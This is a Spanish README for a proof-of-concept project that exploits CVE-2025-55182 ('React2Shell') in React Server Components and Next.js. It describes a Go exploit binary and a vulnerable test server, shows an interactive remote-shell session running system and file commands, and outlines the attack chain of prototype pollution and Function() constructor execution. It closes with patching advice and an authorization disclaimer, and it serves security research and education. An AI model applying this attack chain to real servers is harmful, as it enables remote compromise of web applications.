
Este proyecto proporciona una demostración totalmente funcional de la CVE-2025-55182 (React2Shell): una vulnerabilidad crítica de ejecución remota de código en React Server Components y Next.js.
Este proyecto ofrece una demostración totalmente funcional de CVE-2025-55182 (React2Shell), una vulnerabilidad crítica de ejecución remota de código en React Server Components y Next.js.
Estado: ✅ FUNCIONANDO - Logra ejecución real de comandos en servidores vulnerables
CVE-2025-55182 (ejecutable compilado de 7.8MB)📥 Descargar video de demostración (5.6MB) - Haz clic para descargar y ver el exploit en acción
Lo que muestra la demo:
cd exploited-server
npm run dev
# Server starts on http://localhost:3001
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# When prompted:
Target: localhost:3001
Comandos básicos:
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
Operaciones de archivo:
subh@rce $ touch hello.txt
[+] Created: hello.txt
subh@rce $ vi hello.txt
[i] Enter new content (type 'EOF' on a line by itself to finish):
Hello World!
EOF
[+] File saved: hello.txt
subh@rce $ cat hello.txt
Hello World!
subh@rce $ echo "New content" > hello.txt
[+] File written
subh@rce $ rm hello.txt
[+] Removed: hello.txt
Información del sistema:
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
Salir:
subh@rce $ exit
Este proyecto demuestra:
✅ Explotación real - RCE funcional real en sistemas vulnerables
✅ Investigación de seguridad - Comprensión de vulnerabilidades en frameworks web modernos
✅ Desarrollo en Go - Compilación y uso de herramientas de seguridad
✅ Análisis de vulnerabilidades - Investigación de CVEs y técnicas de explotación
✅ Divulgación responsable - Prácticas éticas de pruebas de seguridad
react-2-shell-demo/
├── CVE-2025-55182 # Compiled Go exploit binary
├── main.go # Go source code
├── exploited-server/ # Vulnerable Next.js app
│ ├── app/
│ │ ├── actions.ts # Server Actions (vulnerable)
│ │ └── page.tsx # Warning UI
│ └── package.json # Next 15.0.1, React 19.0.0
└── *.md # Documentation
CVE-2025-55182 explota una deserialización insegura en React Server Components:
__proto__Function()1. Craft multipart payload with malicious chunks
2. Send to Next.js Server Actions endpoint
3. Trigger prototype pollution via __proto__:then
4. Invoke Function() constructor with command
5. Execute code and return output via redirect
6. Parse result from X-Action-Redirect header
AVISOS CRÍTICOS:
README.md - Este archivoGO_EXPLOIT_USAGE.md - Uso detallado del exploitVULNERABLE_SERVER.md - Guía de configuración del servidorEXPLOITATION_GUIDE.md - Análisis técnico en profundidadUSAGE.md - Ejemplos de uso y comandosnpm run dev en exploited-server)./CVE-2025-55182)Este proyecto demuestra con éxito:
Para sistemas de producción:
Actualiza inmediatamente a las versiones parcheadas:
Rota los secretos si estuvieron expuestos antes del 4 de diciembre de 2025
Supervisa los registros para detectar actividad sospechosa de Server Actions
Audita las aplicaciones que usan Server Components
@subhdotsol - Con fines educativos y de investigación en seguridad
Este código es solo para fines educativos y pruebas de seguridad autorizadas.
Recuerda: Obtén siempre la autorización adecuada antes de probar. ¡Usa con responsabilidad! 🔒